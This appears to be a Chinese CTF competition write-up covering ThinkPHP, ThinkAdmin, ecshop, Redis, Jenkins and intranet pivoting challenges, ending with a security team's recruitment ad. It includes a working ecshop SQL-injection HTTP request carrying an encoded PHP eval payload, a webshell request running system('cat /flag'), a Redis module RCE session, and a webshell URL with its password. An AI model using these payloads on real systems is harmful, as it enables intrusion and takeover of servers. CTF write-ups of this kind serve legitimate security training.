2021【线下】巅峰极客部分题目总结

⽐赛登录信息

https://172.20.1.1/answer_client

tp

thinkphp rce⼯具直接打 但是他过滤了⼀堆的函数 执⾏scnadir的时候发现已经有⼈写了shell 所以就不⽤⾃⼰写了 readfile读了⼀下别⼈的shell 发现有个pass校验 chamd5查得到 然后直接蹭⻋

Sn3rtf4ck 3a50065e1709acc47ba0c9238294364f

写⼀个不死⻢shell

http://10.57.76.67/.ylbnb.php?pass=asondo12n3asd asondo12n3asd

thinkadmin

https://www.cnblogs.com/r00tuser/p/13719819.html

盲猜flag在/flag 读取成功

http://10.57.12.87/testkaoshi/admin/public/admin/login.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a 1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2u302p2v

ecshop

sql注⼊写shell ⾃⼰没打通 继续蹭⻋

POST /user.php HTTP/1.1
Host: 192.168.115.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:289:"*/SELECT
1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f64
6528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675
a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -
";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a45ea207d7a2b68c49582d2d22adf953a
Accept-Encoding: gzip

POST /1.php HTTP/1.1
Host: 192.168.115.6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ECS_ID=3cf1ba0e59bf2946fac9c55251952f0a56644e38; ECS[visit_times]=2; ECS[history]=69;
ECSCP_ID=406a149dcbb6bec16ee2f4d11621a4b4df263034
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
1337=system("cat /flag");

redis

这题。。。弱⼝令然后扩展getshell就好了 但是⼀直没写进去so 然后发现有⼈做出来了 然后就开始疯狂蹭⻋

module load /tmp/exp.so
$ redis-cli -h 192.168.115.2
192.168.115.2:6379> system.exec "id"
"uid=999(redis) gid=999(redis) groups=999(redis)\n"
192.168.115.2:6379> system.exec "ls /"
"=\x01bin\nboot\ndata\ndev\netc\nflag\nflag_j1899\nhome\nlib\nlib64\nmedia\nmnt\nopt\nproc\nroo
t\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n"
192.168.115.2:6379> system.exec "cat /flag*"
"flag{3d0dd2da41f456aadc9f1ec9b9a76f82}\n"
192.168.115.2:6379>

jenkins

⽤goby直接命令执⾏

学校

这⾥是⼀道ctf⽂件包含的题⽬

读到了mysql的密码 但是没发现有mysql连接⽅式 找了⼀下脚本 session包含⽂件 getshell 没啥好说的了 跑了很久我也是运⽓很差了 拿到shell以后发现web⽬录下⾯有phpmyadmin4.3.xxx（版本号忘了）所以应该是phpmyadmin getshell？dirsearch有点low啊 以后还是得⽤御剑

物流

web啥都没发现 扫端⼝发现mysql hydra跑出来是
1q2w3e4r5t6y7u8i ??? mysql-client进去直接查flag

内⽹

0x0

第⼀层wordpress 弱⼝令 猜到密码是ggcloud123 我换了个浏览器以后 直接修改主题 getshell

venom搭建代理隧道

0x1

内⽹继续扫描 发现了讯睿cms

弱⼝令进⼊后台 发现版本 根据版本在官⽹发现了漏洞信息

分析文章

http://w4nder.top/?p=509

没打通 本地搭建环境审计⼀下 发现没有找到这个参数 （也不知道是不是出题⼈改了源码 改成param就可以通了 不深究细节 写个shell

shell写到uploadfiles

在home找到下⼀台机器的信息

0x2

这⾥可以mssql 执⾏命令 低权限应该要提权 但是时间不够 没继续了

Tip

你是否想要加入一个安全团

拥有更好的学习氛围？

那就加入EDI安全，这里门槛不是很高，但师傅们经验丰富，可以带着你一起从基础开始，只要你有持之以恒努力的决心

EDI安全的CTF战队经常参与各大CTF比赛，了解CTF赛事，我们在为打造安全圈好的技术氛围而努力，这里绝对是你学习技术的好地方。这里门槛不是很高，但师傅们经验丰富，可以带着你一起从基础开始，只要你有持之以恒努力的决心，下一个CTF大牛就是你。

欢迎各位大佬小白入驻，大家一起打CTF，一起进步。

我们在挖掘，不让你埋没！

你的加入可以给我们带来新的活力，我们同样也可以赠你无限的发展空间。

**有意向的师傅请联系邮箱[email protected]（带上自己的简历，简历内容包括自己的学习方向，学习经历等）